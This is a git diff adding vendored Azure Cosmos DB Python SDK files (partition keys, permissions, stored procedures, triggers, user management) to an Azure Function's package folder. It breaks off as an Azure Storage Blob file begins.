b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/offer.py new file mode 100644 index 0000000..1392194 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/offer.py @@ -0,0 +1,36 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create throughput properties in the Azure Cosmos DB SQL API service. +""" +from typing import Dict, Any + + +class ThroughputProperties(object): + """Represents the throughput properties in an Azure Cosmos DB SQL API container. + To read and update throughput properties use the associated methods on the :class:`Container`. + """ + + def __init__(self, offer_throughput, properties=None): # pylint: disable=super-init-not-called + # type: (int, Dict[str, Any]) -> None + self.offer_throughput = offer_throughput + self.properties = properties + + +Offer = ThroughputProperties diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/partition_key.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/partition_key.py new file mode 100644 index 0000000..f7fcd76 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/partition_key.py @@ -0,0 +1,88 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create partition keys in the Azure Cosmos DB SQL API service. +""" + + +class NonePartitionKeyValue(object): + """Represents None value for partitionKey when it's missing in a container. + """ + + +class _Empty(object): + """Represents empty value for partitionKey when it's missing in an item belonging + to a migrated container. + """ + + +class _Undefined(object): + """Represents undefined value for partitionKey when it's missing in an item belonging + to a multi-partition container. + """ + + +class PartitionKey(dict): + """Key used to partition a container into logical partitions. + + See https://docs.microsoft.com/azure/cosmos-db/partitioning-overview#choose-partitionkey + for information on how to choose partition keys. + + :ivar path: The path of the partition key + :ivar kind: What kind of partition key is being defined (default: "Hash") + :ivar version: The version of the partition key (default: 2) + """ + + def __init__(self, path, kind="Hash", version=2): # pylint: disable=super-init-not-called + # (str, str) -> None + self.path = path + self.kind = kind + self.version = version + + def __repr__(self): + # type () -> str + return "".format(self.path)[:1024] + + @property + def kind(self): + return self["kind"] + + @kind.setter + def kind(self, value): + self["kind"] = value + + @property + def path(self): + # () -> str + return self["paths"][0] + + @path.setter + def path(self, value): + # (str) -> None + self["paths"] = [value] + + @property + def version(self): + return self["version"] + + @version.setter + def version(self, value): + self["version"] = value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/permission.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/permission.py new file mode 100644 index 0000000..de037e8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/permission.py @@ -0,0 +1,39 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create permissions in the Azure Cosmos DB SQL API service. +""" +from typing import Dict, Any, Union + +from .documents import PermissionMode + + +class Permission(object): + """Represents a Permission object in the Azure Cosmos DB SQL API service. + """ + def __init__(self, id, user_link, permission_mode, resource_link, properties): # pylint: disable=redefined-builtin + # type: (str, str, Union[str, PermissionMode], str, Dict[str, Any]) -> None + self.id = id + self.user_link = user_link + self.permission_mode = permission_mode + self.resource_link = resource_link + self.properties = properties + self.permission_link = u"{}/permissions/{}".format(self.user_link, self.id) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/scripts.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/scripts.py new file mode 100644 index 0000000..3b98c82 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/scripts.py @@ -0,0 +1,422 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, update and delete and execute scripts in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, List, Dict, Union, Iterable, Optional + +from azure.cosmos._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from .partition_key import NonePartitionKeyValue + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + + +class ScriptType(object): + StoredProcedure = "sprocs" + Trigger = "triggers" + UserDefinedFunction = "udfs" + + +class ScriptsProxy(object): + """An interface to interact with stored procedures. + + This class should not be instantiated directly. Instead, use the + :func:`ContainerProxy.scripts` attribute. + """ + + def __init__(self, client_connection, container_link, is_system_key): + # type: (CosmosClientConnection, str, bool) -> None + self.client_connection = client_connection + self.container_link = container_link + self.is_system_key = is_system_key + + def _get_resource_link(self, script_or_id, typ): + # type: (Union[Dict[str, Any], str], str) -> str + if isinstance(script_or_id, str): + return u"{}/{}/{}".format(self.container_link, typ, script_or_id) + return script_or_id["_self"] + + def list_stored_procedures(self, max_item_count=None, **kwargs): + # type: (Optional[int], Any) -> Iterable[Dict[str, Any]] + """List all stored procedures in the container. + + :param int max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An Iterable of stored procedures (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadStoredProcedures( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + def query_stored_procedures(self, query, parameters=None, max_item_count=None, **kwargs): + # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]] + """Return all stored procedures matching the given `query`. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An Iterable of stored procedures (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.QueryStoredProcedures( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + def get_stored_procedure(self, sproc, **kwargs): + # type: (Union[str, Dict[str, Any]], Any) -> Dict[str, Any] + """Get the stored procedure identified by `id`. + + :param sproc: The ID (name) or dict representing stored procedure to retrieve. + :returns: A dict representing the retrieved stored procedure. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be retrieved. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.ReadStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs + ) + + def create_stored_procedure(self, body, **kwargs): + # type: (Dict[str, Any], Any) -> Dict[str, Any] + """Create a new stored procedure in the container. + + To replace an existing sproc, use the :func:`Container.scripts.replace_stored_procedure` method. + + :param body: A dict-like object representing the sproc to create. + :returns: A dict representing the new stored procedure. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given stored procedure couldn't be created. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.CreateStoredProcedure( + collection_link=self.container_link, sproc=body, options=request_options, **kwargs + ) + + def replace_stored_procedure(self, sproc, body, **kwargs): + # type: (Union[str, Dict[str, Any]], Dict[str, Any], Any) -> Dict[str, Any] + """Replace a specified stored procedure in the container. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing stored procedure to be replaced. + :param body: A dict-like object representing the sproc to replace. + :returns: A dict representing the stored procedure after replace went through. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the stored + procedure with given id does not exist. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.ReplaceStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), + sproc=body, + options=request_options, + **kwargs + ) + + def delete_stored_procedure(self, sproc, **kwargs): + # type: (Union[str, Dict[str, Any]], Any) -> None + """Delete a specified stored procedure from the container. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing stored procedure to be deleted. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The sproc wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The sproc does not exist in the container. + :rtype: None + """ + request_options = build_options(kwargs) + + self.client_connection.DeleteStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), options=request_options, **kwargs + ) + + def execute_stored_procedure( + self, + sproc, # type: Union[str, Dict[str, Any]] + partition_key=None, # type: Optional[str] + params=None, # type: Optional[List[Any]] + enable_script_logging=None, # type: Optional[bool] + **kwargs # type: Any + ): + # type: (...) -> Any + """Execute a specified stored procedure. + + If the stored procedure does not already exist in the container, an exception is raised. + + :param sproc: The ID (name) or dict representing stored procedure to be executed. + :param partition_key: Specifies the partition key to indicate which partition the sproc should execute on. + :param params: List of parameters to be passed to the stored procedure to be executed. + :param bool enable_script_logging: Enables or disables script logging for the current request. + :returns: Result of the executed stored procedure for the given parameters. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the stored procedure execution failed + or if the stored procedure with given id does not exists in the container. + :rtype: dict[str, Any] + """ + + request_options = build_options(kwargs) + if partition_key is not None: + request_options["partitionKey"] = ( + CosmosClientConnection._return_undefined_or_empty_partition_key(self.is_system_key) + if partition_key == NonePartitionKeyValue + else partition_key + ) + if enable_script_logging is not None: + request_options["enableScriptLogging"] = enable_script_logging + + return self.client_connection.ExecuteStoredProcedure( + sproc_link=self._get_resource_link(sproc, ScriptType.StoredProcedure), + params=params, + options=request_options, + **kwargs + ) + + def list_triggers(self, max_item_count=None, **kwargs): + # type: (Optional[int], Any) -> Iterable[Dict[str, Any]] + """List all triggers in the container. + + :param max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An Iterable of triggers (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadTriggers( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + def query_triggers(self, query, parameters=None, max_item_count=None, **kwargs): + # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]] + """Return all triggers matching the given `query`. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An Iterable of triggers (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.QueryTriggers( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + def get_trigger(self, trigger, **kwargs): + # type: (Union[str, Dict[str, Any]], Any) -> Dict[str, Any] + """Get a trigger identified by `id`. + + :param trigger: The ID (name) or dict representing trigger to retrieve. + :returns: A dict representing the retrieved trigger. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be retrieved. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.ReadTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs + ) + + def create_trigger(self, body, **kwargs): + # type: (Dict[str, Any], Any) -> Dict[str, Any] + """Create a trigger in the container. + + To replace an existing trigger, use the :func:`ContainerProxy.scripts.replace_trigger` method. + + :param body: A dict-like object representing the trigger to create. + :returns: A dict representing the new trigger. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given trigger couldn't be created. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.CreateTrigger( + collection_link=self.container_link, trigger=body, options=request_options, **kwargs + ) + + def replace_trigger(self, trigger, body, **kwargs): + # type: (Union[str, Dict[str, Any]], Dict[str, Any], Any) -> Dict[str, Any] + """Replace a specified tigger in the container. + + If the trigger does not already exist in the container, an exception is raised. + + :param trigger: The ID (name) or dict representing trigger to be replaced. + :param body: A dict-like object representing the trigger to replace. + :returns: A dict representing the trigger after replace went through. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the trigger with given + id does not exist. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.ReplaceTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), + trigger=body, + options=request_options, + **kwargs + ) + + def delete_trigger(self, trigger, **kwargs): + # type: (Union[str, Dict[str, Any]], Any) -> None + """Delete a specified trigger from the container. + + If the trigger does not already exist in the container, an exception is raised. + + :param trigger: The ID (name) or dict representing trigger to be deleted. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The trigger wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The trigger does not exist in the container. + :rtype: None + """ + request_options = build_options(kwargs) + + self.client_connection.DeleteTrigger( + trigger_link=self._get_resource_link(trigger, ScriptType.Trigger), options=request_options, **kwargs + ) + + def list_user_defined_functions(self, max_item_count=None, **kwargs): + # type: (Optional[int], Any) -> Iterable[Dict[str, Any]] + """List all the user-defined functions in the container. + + :param max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An Iterable of user-defined functions (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.ReadUserDefinedFunctions( + collection_link=self.container_link, options=feed_options, **kwargs + ) + + def query_user_defined_functions(self, query, parameters=None, max_item_count=None, **kwargs): + # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]] + """Return user-defined functions matching a given `query`. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param max_item_count: Max number of items to be returned in the enumeration operation. + :returns: An Iterable of user-defined functions (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + return self.client_connection.QueryUserDefinedFunctions( + collection_link=self.container_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + def get_user_defined_function(self, udf, **kwargs): + # type: (Union[str, Dict[str, Any]], Any) -> Dict[str, Any] + """Get a user-defined functions identified by `id`. + + :param udf: The ID (name) or dict representing udf to retrieve. + :returns: A dict representing the retrieved user-defined function. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be retrieved. + :rtype: Iterable[dict[str, Any]] + """ + request_options = build_options(kwargs) + + return self.client_connection.ReadUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs + ) + + def create_user_defined_function(self, body, **kwargs): + # type: (Dict[str, Any], Any) -> Dict[str, Any] + """Create a user-defined function in the container. + + To replace an existing UDF, use the :func:`ContainerProxy.scripts.replace_user_defined_function` method. + + :param body: A dict-like object representing the udf to create. + :returns: A dict representing the new user-defined function. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the user-defined function couldn't be created. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.CreateUserDefinedFunction( + collection_link=self.container_link, udf=body, options=request_options, **kwargs + ) + + def replace_user_defined_function(self, udf, body, **kwargs): + # type: (Union[str, Dict[str, Any]], Dict[str, Any], Any) -> Dict[str, Any] + """Replace a specified user-defined function in the container. + + If the UDF does not already exist in the container, an exception is raised. + + :param udf: The ID (name) or dict representing udf to be replaced. + :param body: A dict-like object representing the udf to replace. + :returns: A dict representing the user-defined function after replace went through. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the user-defined function + with the given id does not exist. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + + return self.client_connection.ReplaceUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), + udf=body, + options=request_options, + **kwargs + ) + + def delete_user_defined_function(self, udf, **kwargs): + # type: (Union[str, Dict[str, Any]], Any) -> None + """Delete a specified user-defined function from the container. + + If the UDF does not already exist in the container, an exception is raised. + + :param udf: The ID (name) or dict representing udf to be deleted. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The udf wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The UDF does not exist in the container. + :rtype: None + """ + request_options = build_options(kwargs) + + self.client_connection.DeleteUserDefinedFunction( + udf_link=self._get_resource_link(udf, ScriptType.UserDefinedFunction), options=request_options, **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/user.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/user.py new file mode 100644 index 0000000..8698134 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/user.py @@ -0,0 +1,296 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +"""Create, read, update and delete users in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, List, Dict, Union, cast, Iterable, Optional + +from azure.core.tracing.decorator import distributed_trace # type: ignore + +from ._cosmos_client_connection import CosmosClientConnection +from ._base import build_options +from .permission import Permission + + +class UserProxy(object): + """An interface to interact with a specific user. + + This class should not be instantiated directly. Instead, use the + :func:`DatabaseProxy.get_user_client` method. + """ + + def __init__(self, client_connection, id, database_link, properties=None): # pylint: disable=redefined-builtin + # type: (CosmosClientConnection, str, str, Dict[str, Any]) -> None + self.client_connection = client_connection + self.id = id + self.user_link = u"{}/users/{}".format(database_link, id) + self._properties = properties + + def __repr__(self): + # type () -> str + return "".format(self.user_link)[:1024] + + def _get_permission_link(self, permission_or_id): + # type: (Union[Permission, str, Dict[str, Any]]) -> str + if isinstance(permission_or_id, str): + return u"{}/permissions/{}".format(self.user_link, permission_or_id) + try: + return cast("Permission", permission_or_id).permission_link + except AttributeError: + pass + return u"{}/permissions/{}".format(self.user_link, cast("Dict[str, str]", permission_or_id)["id"]) + + def _get_properties(self): + # type: () -> Dict[str, Any] + if self._properties is None: + self._properties = self.read() + return self._properties + + @distributed_trace + def read(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Read user propertes. + + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dictionary of the retrieved user properties. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be retrieved. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + self._properties = self.client_connection.ReadUser(user_link=self.user_link, options=request_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace + def list_permissions(self, max_item_count=None, **kwargs): + # type: (Optional[int], Any) -> Iterable[Dict[str, Any]] + """List all permission for the user. + + :param max_item_count: Max number of permissions to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of permissions (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadPermissions(user_link=self.user_link, options=feed_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + return result + + @distributed_trace + def query_permissions( + self, + query, + parameters=None, + max_item_count=None, + **kwargs + ): + # type: (str, Optional[List[str]], Optional[int], Any) -> Iterable[Dict[str, Any]] + """Return all permissions matching the given `query`. + + :param query: The Azure Cosmos DB SQL query to execute. + :param parameters: Optional array of parameters to the query. Ignored if no query is provided. + :param max_item_count: Max number of permissions to be returned in the enumeration operation. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: An Iterable of permissions (dicts). + :rtype: Iterable[dict[str, Any]] + """ + feed_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.QueryPermissions( + user_link=self.user_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + return result + + @distributed_trace + def get_permission(self, permission, **kwargs): + # type: (str, Any) -> Permission + """Get the permission identified by `id`. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be retrieved. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the retrieved permission. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be retrieved. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission_resp = self.client_connection.ReadPermission( + permission_link=self._get_permission_link(permission), options=request_options, **kwargs + ) # type: Dict[str, str] + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission_resp) + + return Permission( + id=permission_resp["id"], + user_link=self.user_link, + permission_mode=permission_resp["permissionMode"], + resource_link=permission_resp["resource"], + properties=permission_resp, + ) + + @distributed_trace + def create_permission(self, body, **kwargs): + # type: (Dict[str, Any], Any) -> Permission + """Create a permission for the user. + + To update or replace an existing permision, use the :func:`UserProxy.upsert_permission` method. + + :param body: A dict-like object representing the permission to create. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the new permission. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission couldn't be created. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission = self.client_connection.CreatePermission( + user_link=self.user_link, permission=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission) + + return Permission( + id=permission["id"], + user_link=self.user_link, + permission_mode=permission["permissionMode"], + resource_link=permission["resource"], + properties=permission, + ) + + @distributed_trace + def upsert_permission(self, body, **kwargs): + # type: (Dict[str, Any], Any) -> Permission + """Insert or update the specified permission. + + If the permission already exists in the container, it is replaced. If + the permission does not exist, it is inserted. + + :param body: A dict-like object representing the permission to update or insert. + :param Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the upserted permission. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given permission could not be upserted. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission = self.client_connection.UpsertPermission( + user_link=self.user_link, permission=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission) + + return Permission( + id=permission["id"], + user_link=self.user_link, + permission_mode=permission["permissionMode"], + resource_link=permission["resource"], + properties=permission, + ) + + @distributed_trace + def replace_permission(self, permission, body, **kwargs): + # type: (str, Dict[str, Any], Any) -> Permission + """Replaces the specified permission if it exists for the user. + + If the permission does not already exist, an exception is raised. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be replaced. + :param body: A dict-like object representing the permission to replace. + :keyword Callable response_hook: A callable invoked with the response metadata. + :returns: A dict representing the permission after replace went through. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the replace failed or the permission + with given id does not exist. + :rtype: dict[str, Any] + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + permission_resp = self.client_connection.ReplacePermission( + permission_link=self._get_permission_link(permission), permission=body, options=request_options, **kwargs + ) # type: Dict[str, str] + + if response_hook: + response_hook(self.client_connection.last_response_headers, permission_resp) + + return Permission( + id=permission_resp["id"], + user_link=self.user_link, + permission_mode=permission_resp["permissionMode"], + resource_link=permission_resp["resource"], + properties=permission_resp, + ) + + @distributed_trace + def delete_permission(self, permission, **kwargs): + # type: (str, Any) -> None + """Delete the specified permission from the user. + + If the permission does not already exist, an exception is raised. + + :param permission: The ID (name), dict representing the properties or :class:`Permission` + instance of the permission to be replaced. + :keyword Callable response_hook: A callable invoked with the response metadata. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The permission wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The permission does not exist for the user. + :rtype: None + """ + request_options = build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + result = self.client_connection.DeletePermission( + permission_link=self._get_permission_link(permission), options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, result) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__init__.py new file mode 100644 index 0000000..eb3ecab --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/__init__.py @@ -0,0 +1,239 @@ +# 